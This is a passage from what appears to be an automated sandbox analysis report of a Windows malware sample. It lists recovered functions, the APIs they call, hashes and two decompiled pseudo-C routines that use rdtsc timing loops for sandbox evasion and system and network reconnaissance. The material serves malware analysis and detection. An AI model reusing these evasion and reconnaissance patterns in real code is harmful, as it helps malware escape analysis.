                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C280F
                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?,00000000,003C2CFE,?,?,00000003,003C24A4), ref: 003C2845
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdaptersInfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177971545-0
                                                                                                                                                                                                                                          • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                          • Instruction ID: bb11fc6fe3eed2fe7155bbf7ec5d968070fc0d6733d0c1099ac9ef1750c9625d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2318D62605B9096FB16EB62E810B9AB764FB49F94F494029CF0D9B714EF38CA49C300
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C16CB
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,?,00000000,003C2CB1,?,?,00000003,003C24A4), ref: 003C1709
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3114120137-0
                                                                                                                                                                                                                                          • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                          • Instruction ID: c8c7a3c17b1efe81dbd332913f98805f4353568e0c521678c8a86ec9fcbc4b6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421AE62355B4083FF07CB52A814B69A2A9BB8ABC0F194038DE0AD3715EF3CCE469700
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                          • Instruction ID: bf883d324c5e961a7d794fc23aa9d084b8bde4775d35c8a1298948b27ba45f0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3971E336301B918BEB26CF62E810F9937B5FB49B94F098129DE4A93B14DF38CA55D700
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LookupAccountNameW.ADVAPI32 ref: 003C233C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AccountLookupName
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1484870144-0
                                                                                                                                                                                                                                          • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                          • Instruction ID: 98e3a6e471cb0f80a604f29422bbe5e2095da11412a9f3507f89f2eb0ceb38b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F031B372701B418AEB168F75E844BDE73A4FB48788F554139DA4DA3B18EF38CA08C340
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                          			E003C2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E003C11FC(_t73 - 0x29, _t52);
					_t37 = E003C153C(_t73 - 0x29);
					E003C2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E003C1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E003C272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E003C1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E003C2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2434
                                                                                                                                                                                                                                          0x003c2439
                                                                                                                                                                                                                                          0x003c243f
                                                                                                                                                                                                                                          0x003c244d
                                                                                                                                                                                                                                          0x003c244d
                                                                                                                                                                                                                                          0x003c244d
                                                                                                                                                                                                                                          0x003c2512
                                                                                                                                                                                                                                          0x003c2528
                                                                                                                                                                                                                                          0x003c2450
                                                                                                                                                                                                                                          0x003c2454
                                                                                                                                                                                                                                          0x003c2456
                                                                                                                                                                                                                                          0x003c245a
                                                                                                                                                                                                                                          0x003c2460
                                                                                                                                                                                                                                          0x003c2468
                                                                                                                                                                                                                                          0x003c246e
                                                                                                                                                                                                                                          0x003c2472
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c2474
                                                                                                                                                                                                                                          0x003c2482
                                                                                                                                                                                                                                          0x003c248c
                                                                                                                                                                                                                                          0x003c249d
                                                                                                                                                                                                                                          0x003c249f
                                                                                                                                                                                                                                          0x003c24a4
                                                                                                                                                                                                                                          0x003c24a7
                                                                                                                                                                                                                                          0x003c24b0
                                                                                                                                                                                                                                          0x003c24bf
                                                                                                                                                                                                                                          0x003c24c1
                                                                                                                                                                                                                                          0x003c24cc
                                                                                                                                                                                                                                          0x003c24d2
                                                                                                                                                                                                                                          0x003c24d7
                                                                                                                                                                                                                                          0x003c24db
                                                                                                                                                                                                                                          0x003c24e0
                                                                                                                                                                                                                                          0x003c24e2
                                                                                                                                                                                                                                          0x003c24f0
                                                                                                                                                                                                                                          0x003c24f0
                                                                                                                                                                                                                                          0x003c24fc
                                                                                                                                                                                                                                          0x003c2501
                                                                                                                                                                                                                                          0x003c2504
                                                                                                                                                                                                                                          0x003c250d
                                                                                                                                                                                                                                          0x003c250d
                                                                                                                                                                                                                                          0x003c2504
                                                                                                                                                                                                                                          0x003c24cc
                                                                                                                                                                                                                                          0x003c24bf
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c24a7

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                          • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                          • Instruction ID: 3a5526147925d3f94f300cab5f3655c6d3261babce169db677538d4453cf7dd0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621B332300A409AEF12DFB1D850BDE7365F744784F49442ADE4DD7609EE38DA05C350
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                                          • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                                          • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                          • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                                          • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                                          • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                                          • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                          • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                          • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 354099737-0
                                                                                                                                                                                                                                          • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                          • Instruction ID: 9c7c9d9c2d0bd7cd3f8823995ffb501ce7bf21df4d1a396c14df8e8a8c826ec2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6C08C311006B0C2F31F5720E968F29623CA341309F01061DC303D5AE08F3C1AC8D303
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                          • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,003C1E13), ref: 003C264B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                                          • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                          • Instruction ID: 3a2d15c42007ff3074eb114a3080d111b7fbc97399c866a5e034371daad1b4c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02E09262724551C2EF12EB20E8547D93324FB84704F840126894E92660EF2CCB5DCB00
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                          • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                          • Instruction ID: 5b490d2d9c1044e8f91cdc1b49e4fbc6d1478f64234bfb903e92802c00fa508e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D0A773E1025083F7318710EA16B9A6315F3D5315F804206C54984554CF3CC258C700
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %
                                                                                                                                                                                                                                          • API String ID: 0-2567322570
                                                                                                                                                                                                                                          • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                          • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2092577274.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092563650.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092605458.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092639503.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2092680325.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                          • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 003C1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                          			E003C1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                                          0x003c1e50
                                                                                                                                                                                                                                          0x003c1e50
                                                                                                                                                                                                                                          0x003c1e50
                                                                                                                                                                                                                                          0x003c1e50
                                                                                                                                                                                                                                          0x003c1e55
                                                                                                                                                                                                                                          0x003c1e5a
                                                                                                                                                                                                                                          0x003c1e5f
                                                                                                                                                                                                                                          0x003c1e60
                                                                                                                                                                                                                                          0x003c1e6b
                                                                                                                                                                                                                                          0x003c1e6b
                                                                                                                                                                                                                                          0x003c1e71
                                                                                                                                                                                                                                          0x003c1e73
                                                                                                                                                                                                                                          0x003c1e84
                                                                                                                                                                                                                                          0x003c1e86
                                                                                                                                                                                                                                          0x003c1e8a
                                                                                                                                                                                                                                          0x003c1e8e
                                                                                                                                                                                                                                          0x003c1e92
                                                                                                                                                                                                                                          0x003c1e96
                                                                                                                                                                                                                                          0x003c1e98
                                                                                                                                                                                                                                          0x003c1e9f
                                                                                                                                                                                                                                          0x003c1ea2
                                                                                                                                                                                                                                          0x003c1ea5
                                                                                                                                                                                                                                          0x003c1eab
                                                                                                                                                                                                                                          0x003c1ead
                                                                                                                                                                                                                                          0x003c1eb8
                                                                                                                                                                                                                                          0x003c1eba
                                                                                                                                                                                                                                          0x003c1ec1
                                                                                                                                                                                                                                          0x003c1ec4
                                                                                                                                                                                                                                          0x003c1ec7
                                                                                                                                                                                                                                          0x003c1ec7
                                                                                                                                                                                                                                          0x003c1ee9

                                                                                                                                                                                                                                          Memory Dump Source
